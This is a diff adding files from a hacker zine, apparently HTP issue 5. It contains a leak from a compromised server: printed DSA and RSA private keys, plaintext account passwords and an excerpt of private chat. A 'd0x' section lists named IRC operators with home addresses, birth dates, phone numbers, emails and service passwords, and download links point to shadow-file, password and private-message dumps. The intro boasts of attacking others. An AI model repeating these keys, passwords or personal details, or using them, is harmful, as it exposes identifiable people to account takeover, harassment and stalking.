+drwxr-xr-x  3 backup users    264 2011-08-13 01:27 magic
+drwxr-xr-x  3 backup users   1416 2011-07-26 12:32 merlin
+drwxr-xr-x  2 backup users   1432 2011-05-16 05:55 multimag
+drwxr-xr-x  2 backup users   1640 2010-10-11 15:49 phantom
+drwxr-xr-x  2 backup users   1680 2011-01-13 15:57 sidewinder
+drwx------  2 backup users    320 2011-08-12 18:52 .ssh
+drwxr-xr-x  2 backup users   1176 2009-10-14 10:52 sydex
+-rw-------  1 backup  1452   4999 2011-08-12 18:52 .viminfo
+
+backup@sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII            
+-----BEGIN DSA PRIVATE KEY-----
+MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
+mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
+OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
+b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
+1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
+iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
+qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
+coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
++y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
+ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
+hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
+7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
+snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
+mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
+swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
+XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
+yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
+ovpJJvoWRqPg6WS+lyV49RWzMw==
+-----END DSA PRIVATE KEY-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
+a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
+Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
+Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
+oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
+dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
+UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
+6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
+hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
+RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
+rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
+tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
+mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
+1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
+fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
+AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
+PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
+XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
+dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
+WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
+fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
+K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
+NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
+ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
+yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
+-----END RSA PRIVATE KEY-----
+
+jared@sidewinder.netonecom.net weJAruSE
+http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
+trix@sidewinder.netonecom.net trix4kids
+
+molkmin -> jared: ah, you plan on lettingothers ssh in? 
+jared -> molkmin: no i thought you did 
+molkmin -> jared: hell no. 
+jared -> molkmin: okay well then forget what i said 
+molkmin -> jared: there are like 5 people that can ssh into sidewinder 
+molkmin -> jared: or maybe 7 
+jared -> molkmin: and only 2 of them are convicted felons 
+molkmin -> jared: I just recently secured SSH 
+jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
+molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL 
+jared -> molkmin: grr
+
+:: 0x06 - d0x ::
+Axod
+Name: Jimmy Moore
+Location: Probably out of the UK
+NickServ: axod:383cf3a3f7c2
+Oper: axod:ce18da2ddae4
+Email: jimmy.moore@gmail.com
+Email2: jimmy@axod.net
+Email3: axod@axod.net
+Email4: axodmedia@gmail.com
+Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
+http://bizzy.co.uk/uk/05956691/axod-media
+http://twitter.com/#!/mibbit
+http://twitter.com/#!/axod
+http://digg.com/axod
+http://axod.blogspot.com/
+
+
+Azander
+Name: Alanon Zander
+Address: 2132 South 29 Rd Cadillac, MI 49601
+NickServ: Azander:kikicat
+Oper: azander:flagon3
+Email: alanonzander@gmail.com <<< kikicat
+Email2: alanonzander@yahoo.com <<< password recovery sends back to gmail LOL
+https://plus.google.com/113170461621014873855/posts
+http://www.myspace.com/alanonzander
+http://user.netonecom.net/~azander/alanon.htm
+
+
+Havvy
+Name: Ryan Havvy
+Age: 18?
+Address: Somewhere in Washougal, WA
+NickServ: Havvy:hmagic
+Oper: havvy:hknight
+Email: ryan.havvy@gmail.com
+http://twitter.com/#!/havvy
+http://havvy.wordpress.com/
+http://www.stumbleupon.com/stumbler/Havvy/
+havvy havvy
+xkcd.com/936/ Password security explained in a couple panels.
+10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
+
+
+Hercule
+Name: Jürgen Wind
+Location: Germany
+NickServ: Hercule:herc47
+Oper: hercule:0b2ac71dc51f
+Email: jwind@gmx.de
+
+
+Joshua
+Name: Joshua Luckers
+Age: 23
+DOB: 06/15/1988
+NickServ: Joshua:TwEaKeRs
+Oper: joshua:ec31e1a98607
+Email: joshua@sensiva.net
+Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
+http://joshualuckers.nl/
+
+Kitsune
+Name: Todd Parker
+Email: kitsune@sbcglobal.net
+NickServ: Kitsune:undquiet
+Oper: kitsune:$5T`mIb5705
+http://nenolod.net/~nenolod/mibbit-debacle.html
+
+
+Molkmin
+Name: Thomas W Lyon
+Age: 58
+DOB: 06/04/1953
+Address: 2188 US Highway 10 Sears, MI 49679-8073
+NickServ: molkmin:sotw1btn
+Oper: molkmin:ghotisotwbtn
+Email: tlyon@netonecom.net
+Email2: fxrocker@gmail.com
+Phone: 231-734-6144
+http://www.netonecom.net
+http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
+http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
+
+
+Pottsi
+Name: Ian Potts
+Age: 24
+Location: Manchester, UK
+NickServ: pottsi:digger
+Email: pottsi@pottsi.com
+Email2: ian1potts@aol.com
+Email3: iantom90@hotmail.co.uk
+http://pottsi.com/
+http://www.myspace.com/56242380
+
+
+Sindacious
+Name: James Clifton Newton
+Age: 19
+DOB: 05/06/1992
+Address: 1506 Jenks Ave Panama City, FL 32405
+Oper: sindacious:284adflgy343
+Phone: 785-746-0322, 850-215-2518
+Email: admin@SinIRC.net
+http://sindacio.us/
+http://www.sindacious.com (It just redirects to sindacio.us)
+http://twitter.com/sindacious
+
+:: 0x07 - exit ::
+
+>>> K1LL Th3 G1b50n!
+
+attachm3nts >>>
+
+n3t0nec0m shad0ws
+m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
+m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
+
+w1k1 pass3s
+m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
+m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
+
+n1cks3rv pass3s
+m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
+m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
+
+pMs
+m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
+m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
+
+cHaN msGs
+http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
+
+
+root@tools:~# wall <<< "E0F"
+                                                                               
+Broadcast Message from root@tools                                              
+        (/dev/pts/3) at [redacted] ...                                         
+                                                                               
+E0F

htp/HTP5/0x00_Intro.txt

@@ -0,0 +1,113 @@
+                                                                                
+                            █████████████▒████████                              
+                        ▓▒██████▒░█░███░░ ▒███████████▒                         
+                     ███████████   ▓█████████████████████▒                      
+                  ▓████  ▒█████████▒▒░███████████████████████▒                  
+              ░▒███████░████████▒██     ▒██████████████████████░                
+             ▓███████████████▒██  ░█     ░████████████████████████░             
+            ████████████████████▒  ███▒█████████████████████████████            
+          ░████████▒██████████████████     ▒█████████████████████████▒          
+         ███████████▒████████████     ▒     ███████████████████████████▒        
+       ▒██████████▒ ░████████████     ▒██▓  ░▒██████████████████████████▒       
+       █████████  ▒███▒   ███████░    ███████████████████████████████████       
+      █████████░██████    █████▒██▓ ▓███████▒▒████████████████████████████      
+    ▒██████████████████   ████▒▓▒█▒   █████████████████████████████████████     
+   ░████████████████████░▓█░    ░█     ░▓███████████████████████████████████    
+   ███████████████████▓   ░       █       ░██████████████████████████████████   
+  ████████████████████            █▒   ██░▒███████████████████████████████████  
+ ▒███████████████████     ▒     ▒▓███▒▓    ███████████████████████████████████  
+░██████████████████       █▓▓▓▓█░  █        ████████████░     ░████████████████ 
+██████████████████      ▓███       █░       █████████████▓██████████████████  █ 
+██████████████████   ░░  ▓█         ▒        ███████████████████████████████  ▓ 
+██████████████████░ ▓     █░        █        ███████████████████████████████░   
+██████████████████        ██       ▒███      ████████████████████████████████▒█ 
+███████████████▒██         █     ░▒▒██      ░▒████████████████████████████ █    
+███████████████▒▒▒         ███               ████████████████████████████▒ █░   
+█░ ▓▓██████   ░ ▓█      ████▒         █      ████████████████████████████  █▓   
+     ██████▒    ▒█     ▒   █▓         █      ▓████████████████████████████ ▒█▒  
+▓  ▒▒█▓█▓████   ▒▒██▒                 ██  ▒▒▒░█████████████████████████████▓██  
+███▓   █░  ▒██████░         ░       ░▓███▒      ██████████████████████████████░ 
+██     █▓   ░████▒▒         ██  ▒  ░▒▒▓█▒        █████████████████████████████  
+░      ▓█▓    ██████▓▒      ███        ██         ██▓█▒▓░  ░██████████████████  
+▒░     ░███   ████████████▒▒ ▓▓        ▓█░        █         ██████████████████  
+█▒    ▒██▒   ██████████████   ░         █▒      ▒▒█▒▓   ▒▒▒░██████████████████  
+██   ██ ▒▓  ███████████████████         ██▒ ▒███▒▓██▓       █    ░████████████  
+██▓█     █  ███████████████████▒       ███▓       ▓█        █▓    ████████████▓ 
+███       ██████████████████████░▒▒█▒   ▒█         █▒       ██     ██████████▓  
+█▒█       ████████████████████████       ░░        █▒       ▒      ▓██████████  
+▒▒█       ███████████████████████         █        █        ▒      ▒▒█████████▓ 
+█▒       ▒███████████████████████▒        █        ██      ██▒     ██  ░███▒ ██ 
+██ █   ▒░  ▓███████████████████ ██       ███▒ ▒   ░██      █▒▒    ▒████░░██  ██ 
+ █▓███▒     ██▓▒█████████████░   ██ ▓█░░░░██░      █▒      ▒      ░█░   ▓█░░██░ 
+  ████▒       █ ▓███████████    ▓███░      █       ▓█      ▒            ▒▓ ███  
+  █████       ███  ████████░  ▒█░ ██       █       ██     ▒▓      ▒    ███ ██   
+   █▓██▓      ██▒   ▒███████▓      █▒      ▓▓     ░███    ██▒▒▒ ▒█░  ███████▒   
+    ▒█░▒     ░ ░█░   ███████▒       ░▓     ▒█████▒███▓░  ▒███▒████░ ███████▒    
+    ▒█████░░     ░▒  ░███████       ░█▓  ░░███     █      █    █    ██████▓     
+     ▒██████      ▒███████████  ░  ▒▒███    ░▓     █     ░    ░█    █████▒      
+      ▒███████▒    ███  ▒██████░███▒▒▒█░      ▒    ▓    █░    █   ░████▓        
+        ███████  ░█░ ░▒    ▓██████     █     ▒█    █░  ▓██░░█▒▒  ▒████▒         
+         ▓███████     ▒█▒  ░██ ▒██       ▒    ███████ ███░████▓██████           
+      /████████    /████████    /██████████████████     /███████████████▄       
+     |▒████████    |████████   |▒██████████████████    |▒█████████████████      
+     |▒████████    |████████   |▒██████████████████    |▒██████▀▀▀▀▀▀█████      
+     |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█   |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/    |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▓▓▓▓▓▓█         |▒█▓▓▓▓▓     |▓▓▓██      
+     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▒▒▒▒▒▒█         |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█▒▒▒▒▒▒█         |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██      
+     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█░░░░░░█         |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀       
+     |▒█░░░░░░█▀▀▀▀▒█░░░░░░█        |▒█░░░░░░█         |▒█░░░░░█                
+     |▒█░░░░░░█   |▒█░░░░░░█        |▒█      █         |▒█░░░░░█                
+     |▒█      █   |▒█      █        |▒█▄▄▄▄▄▄█         |▒█     █                
+     |▒█▄▄▄▄▄▄█   |▒█▄▄▄▄▄▄█        |/▒▒▒▒▒▒▒/         |▒█▄▄▄▄▄█                
+     |/▒▒▒▒▒▒▒/   |/▒▒▒▒▒▒▒/                           |/▒▒▒▒▒▒/   ░ ░░▒  ZINE 5
+                                                                                
+htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                     NORTH KOREA OF THE INTERNET SINCE 2011                     
+                                                                                
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+                                                                                
+ So its been 182 days since our last zine, since then our dedicated team        
+ of researchers, philanthropists, playboys and troublemakers have been          
+ busy at work scouring the Internet for high quality entertainment at the       
+ expense of everybody who isn't us.                                             
+                                                                                
+ 5/1 also marks the day HTP was founded, which means we've had two              
+ glorious years of being the best and owning the rest. Today we will be         
+ drinking 40s, listening to some balla tunes, and circlejerking over the        
+ inevitable confusion, awe, bitterness and jokes that will ensue from           
+ this release. :)                                                               
+                                                                                
+ Due to the immense size of HTP5, this zine is unfortunately not self           
+ extracting. However do not fret, this zine is full HD and 4D ready.            
+ We've divided everything into its own section just to keep things sane.        
+                                                                                
+ So go get the popcorn ready and strap in for a long and wild ride. This        
+ zine is a tale of trust, betrayal, brotherhood, rampant paranoia,              
+ hilariously shoddy police work (More on that later), and the plight of         
+ the whitehat sheep being fleeced at will by their blackhat shepherds.          
+ It's really only missing a tacked on love story, a few good car chases,        
+ and an explosion at the end, but it might not be too late for all of that.     
+                                                                                
+                                                                                
+                      ▀ ▄                                                       
+                         █▄▄                                                    
+                    ▄____ ░ █▄                                                  
+          ▄   ▄███▀▀ \;',`'-,▓█░                                                
+            ▓██▀-;_,;  ':-;_,'.█▓░                                              
+          ▓▓██;   '/    ,  _`.-\█▓                                              
+        ░▓███▄'`. (`     /` ` \`|█                                              
+     ░ ▓▓▓ █|██  `\`-.   \_   / |▓                                              
+   ░█▓▓█▓░░ |  █▓ (   `,  .`\ ;'|░                                              
+  ░▓▓█░ ░░   \ ░ ▓░░ .'     `-'/▀                                               
+▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░      .'▀                                                
+░██▓▀ ▀█████████████████▄.-'`                                                   
+ ███░  ███▀▀███▀▀███  ███                                                       
+ █████████  ███  ███▄▄███  2013  ▒ ░                                            
+ █████████  ███  ██████▀                                                        
+ ███   ███  ███  ███                                                            
+▄███▄ ▄███▄ ███ ▄███▄                                                           
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀                                                          
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x01_MIT-EDUCAUSE.txt

@@ -0,0 +1,285 @@
+░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
+                                                                                
+                                                                                
+                                           ▄                                    
+                                       ░████▓██▓██▓▒▒▒░                         
+                                  ░▒██████▓▓███████▒████▒░░░░                   
+                              ░▓████████████████▒██▓████▒▒░░ ░░   ░░░░          
+                           ░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░        
+                         ▒████████████████████████████████▓▓▓██████▓ ▒  ░░      
+                        █▓▓███████████████████████████████████████▓▓▓  ░ ░ ░▒   
+                      ░▓▓█▓███████████████████████████████████████████░ ▒ ░  ▒░ 
+                    ▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒    ░ 
+                 ░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░  ░ ░
+               ░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒  ░  ░░
+              ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░  
+            ░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█   ▒░
+           ░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
+         ░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
+        ▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
+       ▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
+      ▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
+      █▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
+     ░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
+     ░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
+     ░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
+    ▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
+    ██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
+    ██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
+    ████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
+    █▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
+    ▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
+    ▒█▒░ ▓ ░▒▒░  ░  ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
+    ░█▒░  ░               ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
+     ░░                   ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
+       ░                 ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
+       ░                ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
+        ░       ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░  ░░░▒░▒█████████
+         ░░░░ ░▒▓▒     ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
+          ░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
+            ░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
+             ░ ░▒▒▒░    ░░▒▒░░      ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
+              ░░░░░     ░▒▒░░       ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
+              ░░░      ░▒▒░░        ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
+              ░░                    ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
+              ░░                   ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
+             ░░                   ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
+            ░░░                  ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
+            ░░                  ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
+            ░ ░░░░░             ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
+           ░░ ░▒░░░░░          ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
+           ░░░░░ ░░▒▒░        ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
+             ░▓▒▒▒▒▒▓░        ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
+                ▒░░░         ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
+                 ░           ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░ 
+                ░             ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░  
+                ░░░░░░░░░░░░  ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒   
+                 ░▒▒▒▒▒▒▒▓▓▒░  ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░   
+                  ░▒▒      ░░░  ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░  
+                   ░   ░░░░░    ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░  
+                   ░▒▒▓▓▒░░     ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒   
+                   ░░░▒▒░░░     ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░   
+                    ░           ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░   
+                     ░         ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░   
+                     ░        ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░  
+                     ░      ░░░▒▒▒▒▒▒▒▒▒░   ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
+                      ░░   ░▒▒▒▒▒▒▒▒░░       ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
+                        ░░░▒▒▒▒▒░░░          ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
+                                             ░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
+                                              ░  ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
+                                               ░   ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
+                                                ░     ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
+                                                ░       ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
+                                                ░           ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
+                                                 ░              ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
+                                                ▒              ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
+                                             ▒▒██           ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
+                                          ░▒█▓██▒          ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
+                                         ▓███▓██         ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
+                                      ░░█████▓▒    ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
+                                     ░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
